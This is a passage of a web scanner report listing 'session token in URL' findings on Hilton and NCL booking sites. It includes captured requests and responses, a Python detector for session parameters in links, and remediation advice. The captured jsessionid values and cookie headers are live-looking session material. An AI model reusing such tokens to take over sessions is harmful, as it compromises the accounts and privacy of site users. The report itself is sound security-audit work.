Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635647394:ss=1317635584777

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Location: https://secure3.hilton.com/en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e2s1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Date: Mon, 03 Oct 2011 12:53:58 GMT
Connection: keep-alive
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: corporateId=; domain=.hilton.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 521

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://secure3.hilton.com/en_US/h
...[SNIP]...

9.14. http://vdassets.bitgravity.com/embeds/videos/54834a058f00d/2adf12c322cf26d8daa82578343bfb02-ncl_default_hq.json

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://vdassets.bitgravity.com
Path:   /embeds/videos/54834a058f00d/2adf12c322cf26d8daa82578343bfb02-ncl_default_hq.json

Issue detail

The scanner flagged the query-string parameter voxtoken on its name alone. Its value here is the fixed literal "system", not a per-session identifier, and the request carries no cookies at all, so treat this as a probable false positive pending manual confirmation (the other findings in this section, with their long jsessionid values, are the real ones):

Request

GET /embeds/videos/54834a058f00d/2adf12c322cf26d8daa82578343bfb02-ncl_default_hq.json?voxtoken=system&width=768&height=457&player_profile=ncl_default_hq&userAgent=Windows_Chrome&flash=10.3%20r183&silverlight=4&version=3.35 HTTP/1.1
Host: vdassets.bitgravity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:47:43 GMT
Server: VoxCAST
Cache-Control: max-age=3600
Content-Type: text/plain
Expires: Mon, 03 Oct 2011 13:47:41 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 03 Oct 2011 02:28:50 GMT
Content-Length: 646
X-Cache: MISS from VoxCAST


document.write("<object type=\"application/x-shockwave-flash\" id=\"embedded_player_54834a058f00d\" name=\"embedded_player_54834a058f00d\" width=\"768\" height=\"457\" data=\"http://vdassets.bitgravi
...[SNIP]...
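The check behind findings 9.10 through 9.14, as an added example that is not part of the scanner report or any of the vendors' code. It looks for session-like parameters in a URL, distinguishing servlet path parameters (;jsessionid=) from query-string parameters, scans links in an HTML body after entity-decoding them (so the &#59; form in the 302 bodies is not missed), and rates a name-only match with a short literal value such as voxtoken=system as tentative rather than firm. The parameter-name list, the confidence heuristic, the SAMPLE_BODY text and the example hostnames are assumptions made for the demonstration; the token values in the sample are copied from the findings above.

```python
"""Added example (not part of the scanner report or any vendor code): the
check behind a "session token in URL" finding, written to cover the three
wrinkles visible in 9.10-9.14: servlet path parameters (;jsessionid=),
links whose ';' is entity-encoded as '&#59;' in 302 bodies, and name-only
matches such as voxtoken=system that deserve lower confidence."""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names that conventionally carry a session identifier (assumed list).
SESSION_PARAM_NAMES = {
    "jsessionid", "phpsessid", "asp.net_sessionid", "aspsessionid",
    "sessionid", "session_id", "sid", "cfid", "cftoken",
}
# Looser, scanner-style name hint; this is what matches 'voxtoken'.
NAME_HINT_RE = re.compile(r"sess|token", re.IGNORECASE)
# Servlet URL rewriting puts the token in a path parameter: /page.htm;jsessionid=VALUE?query
PATH_PARAM_RE = re.compile(r";(?P<name>[A-Za-z0-9_.\-]+)=(?P<value>[^;/?#]*)")
HREF_RE = re.compile(r"""<a\b[^>]*?\bhref\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def looks_like_session_name(name):
    return name.lower() in SESSION_PARAM_NAMES or NAME_HINT_RE.search(name) is not None


def token_confidence(value):
    """'firm' when the value is shaped like a generated identifier (12+ chars,
    at least two of lower/upper/digit); 'tentative' for short or plain-word
    literals such as 'system', which are probable false positives."""
    if len(value) < 12:
        return "tentative"
    classes = sum(re.search(p, value) is not None for p in (r"[a-z]", r"[A-Z]", r"[0-9]"))
    return "firm" if classes >= 2 else "tentative"


def find_session_tokens(url):
    """Return (location, name, value, confidence) for each session-like
    parameter in a URL; location is 'path' for ;name=value path parameters
    or 'query' for query-string parameters."""
    parts = urlsplit(url)  # urlsplit keeps ';params' inside .path
    hits = []
    for m in PATH_PARAM_RE.finditer(parts.path):
        name, value = m.group("name"), m.group("value")
        if looks_like_session_name(name):
            hits.append(("path", name, value, token_confidence(value)))
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if looks_like_session_name(name):
            for value in values:
                hits.append(("query", name, value, token_confidence(value)))
    return hits


def find_links_with_tokens(body):
    """Return (decoded_url, hits) for every <a href> in an HTML body that
    embeds a session token. The href is entity-decoded first: a server that
    writes the path separator as '&#59;' would otherwise hide the token from
    a naive ';jsessionid=' search."""
    found = []
    for href in HREF_RE.findall(body):
        url = html.unescape(href)
        hits = find_session_tokens(url)
        if hits:
            found.append((url, hits))
    return found


# Constructed sample response body, shaped like the 302 and navigation
# snippets in the findings (hostnames invented, token values from the report).
SAMPLE_BODY = """<p>It's now at <a href="https://booking.example/reserve.htm&#59;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623?execution=e2s1">here</a>
<li><a href="https://www.example/groups/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=Business">Meetings</a>
<a href="/media/images/logos/hdr_logo.gif">logo</a>
<a href="http://cdn.example/player.json?voxtoken=system&amp;width=768">player</a>"""

if __name__ == "__main__":
    for url, hits in find_links_with_tokens(SAMPLE_BODY):
        for location, name, value, confidence in hits:
            print(f"{confidence:9} {location:5} {name}={value[:24]}  in {url[:60]}")
```

Run it as-is to see the three flagged links, two firm and one tentative. On the remediation side, the Java servlet containers behind these hosts should stop rewriting URLs altogether: with Servlet 3.0 or later that is `<session-config><tracking-mode>COOKIE</tracking-mode></session-config>` in web.xml, while secure3.hilton.com advertises Servlet/2.5, where that element does not exist and the container's own URL-rewriting switch has to be turned off and any response.encodeURL() calls audited instead. The cookie that replaces the path parameter should carry the Secure and HttpOnly flags.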

9.15. http://www.hilton.com/en/hi/brand/about.jhtml

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.hilton.com
Path:   /en/hi/brand/about.jhtml

Issue detail

The response contains the following links that embed the session token as a ;jsessionid= path parameter. The client already sent the same token (UM1GHUXVYDE3SCSGBJBOD4Q) in its JSESSIONID cookie, so the server is rewriting URLs unconditionally rather than only as a fallback for cookie-less clients; the rewritten links also point at several other brand hosts (conradhotels, doubletree, embassysuites, hamptoninn, home2suites, homewoodsuites):

Request

GET /en/hi/brand/about.jhtml HTTP/1.1
Host: www.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=UM1GHUXVYDE3SCSGBJBOD4Q; cross-sell=hi; mmcore.tst=0.056; mmid=1706281310%7CFAAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=1706281310%7CFAAAAAodekFwyAYAAA%3D%3D; ClrCSTO=T; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317640644129:ss=1317640644129

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 37539
Date: Mon, 03 Oct 2011 14:17:04 GMT
Connection: close
Vary: Accept-Encoding

<!-- <SETVALUE PARAM="content_head" VALUE="`fileURL("home_head.jhtml")`"> -->

<!-- <SETVALUE PARAM="content_footer" VALUE="`fileURL("home_footer.jhtml")`"> -->


<!DOCTYPE HTML PUBLIC "-//W3C//
...[SNIP]...
<br>
                           
                   <a href="http://www.hilton.com/en/hi/help/sign_in_help.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" rel="nofollow">Forgot password?</a>
...[SNIP]...
<li id="navmain01" title="Specials &amp; Packages"><a href="http://www.hilton.com/en/hi/promotions/index.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q">Specials & Packages</a>
...[SNIP]...
<li id="navmain03" title="Meetings"><a href="http://www.hilton.com/en/hi/groups/index.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q?eventType=Business">Meetings</a>
...[SNIP]...
<li id="navmain0302" title="Social Gatherings"><a href="http://www.hilton.com/en/hi/groups/index.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q?eventType=Social&it=Tnav,GM">Social Gatherings</a>
...[SNIP]...
<li id="navmain05" title="Travel Guides"><a href="http://www.hilton.com/en/hi/ctg/index.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q">Travel Guides</a>
...[SNIP]...
<li id="navmain07" title="My Favorite Hotels"><a href="http://www.hilton.com/en/hi/cart/index.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q">My Favorite Hotels</a>
...[SNIP]...
<td width="133" valign="top">
       <a href="http://conradhotels.hilton.com/en/ch/brand/about.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...
<br>
       <a href="http://doubletree.hilton.com/en/dt/brand/about.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...
<br>
       <a href="http://embassysuites.hilton.com/en/es/brand/about.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...
<br>
       <a href="http://hamptoninn.hilton.com/en/hp/brand/about.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...
<br>
       <a href="http://www.hilton.com/en/hi/brand/about.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...
<br>
       <a href="http://home2suites.hilton.com/en/ht/promotions/about_us/index.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...
<br>
       <a href="http://homewoodsuites.hilton.com/en/hw/brand/about.jhtml;jsessionid=UM1GHUXVYDE3SCSGBJBOD4Q" class="adtnavlinks"><span class="adtnavlinks">
...[SNIP]...

9.16. http://www.hilton.com/en/hi/info/site_usage.jhtml

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.hilton.com
Path:   /en/hi/info/site_usage.jhtml

Issue detail

The response contains the following links that embed the session token as a ;jsessionid= path parameter, again despite the client having presented the same token (S2VXAICTPUQJWCSGBIYMVCQ) in its JSESSIONID cookie:

Request

GET /en/hi/info/site_usage.jhtml HTTP/1.1
Host: www.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/site-usage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; mmcore.tst=0.798; mmid=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635909366:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 67255
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:15 GMT
Connection: close

<!-- <SETVALUE PARAM="content_head" VALUE="`fileURL("home_head.jhtml")`"> -->

<!-- <SETVALUE PARAM="content_footer" VALUE="`fileURL("home_footer.jhtml")`"> -->


<!DOCTYPE HTML PUBLIC "-//W3C//D
...[SNIP]...
<br>
                           
                   <a href="http://www.hilton.com/en/hi/help/sign_in_help.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow">Forgot password?</a>
...[SNIP]...
<li id="navmain01" title="Specials &amp; Packages"><a href="http://www.hilton.com/en/hi/promotions/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Specials & Packages</a>
...[SNIP]...
<li id="navmain03" title="Meetings"><a href="http://www.hilton.com/en/hi/groups/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=Business">Meetings</a>
...[SNIP]...
<li id="navmain0302" title="Social Gatherings"><a href="http://www.hilton.com/en/hi/groups/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=Social&it=Tnav,GM">Social Gatherings</a>
...[SNIP]...
<li id="navmain05" title="Travel Guides"><a href="http://www.hilton.com/en/hi/ctg/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Travel Guides</a>
...[SNIP]...
<li id="navmain07" title="My Favorite Hotels"><a href="http://www.hilton.com/en/hi/cart/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">My Favorite Hotels</a>
...[SNIP]...

9.17. http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.ncl.com
Path:   /nclweb/cbooking/pricingQualifierForm.html

Issue detail

The URL in the request carries the session token as a ;jsessionid= path parameter rather than in the query string; the same value is also present in the JSESSIONID cookie, so the URL copy adds exposure without serving any purpose:

Request

GET /nclweb/cbooking/pricingQualifierForm.html;jsessionid=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336 HTTP/1.1
Host: www.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.4.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646122505-New%7C1320238122505%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 69014
Date: Mon, 03 Oct 2011 12:48:23 GMT
Connection: close


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<meta charset="utf-8">
<title>


NCL - Ge
...[SNIP]...

9.18. http://www.ncl.com/nclweb/cbooking/submitCruiseDetailsForm.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.ncl.com
Path:   /nclweb/cbooking/submitCruiseDetailsForm.html

Issue detail

The response sets the session in a JSESSIONID cookie and, in the same 302, embeds the identical token in the Location header and in the body link below (with the path separator encoded as &#59;). This is the first request of the session, so the token is exposed in the URL before the server has any way to know whether the client accepts cookies:

Request

GET /nclweb/cbooking/submitCruiseDetailsForm.html?packageId=1912713&itineraryCode=15819 HTTP/1.1
Host: www.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.4.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646122505-New%7C1320238122505%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html;jsessionid=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 03 Oct 2011 12:48:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; path=/
Set-Cookie: NCLPERSIST1=868788416.20480.0000; path=/
Content-Length: 431

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html&#59;jsessionid=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336">http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html&#59;jsessionid=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336</a>
...[SNIP]...

9.19. http://www1.hilton.com/en_US/hh/home_index.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hh/home_index.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /en_US/hh/home_index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?it=Tnav,HHonors HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://hhonors1.hilton.com/en_US/hh/home_index.do?it=Tnav,HHonors
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Mon, 03 Oct 2011 13:05:31 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:31 GMT;path=/


9.20. http://www1.hilton.com/en_US/hi/customersupport/index.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/index.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /en_US/hi/customersupport/index.do;jsessionid=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64 HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; NSC_qse-qgt=44153d5f3660; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637037222:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:16:56 GMT
Content-Length: 35005
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:27:56 GMT;path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...

9.21. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do;jsessionid=89A82514A002A1CE9413C2D5351C2762.etc33?opTitle=hotel_primary_nav_dining&cid=OH,HH,boslh,Dining_Menu_ConnollysF HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=6134AD4FCABA66CF1C1924679BB50856.etc33; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:10 GMT;path=/
Content-Length: 49172


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...

9.22. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/index.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149& HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; NSC_qse-qgt=44153d5f3660; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 12:53:40 GMT
Content-Length: 84951
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:04:40 GMT;path=/


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...

9.23. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/index.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149& HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
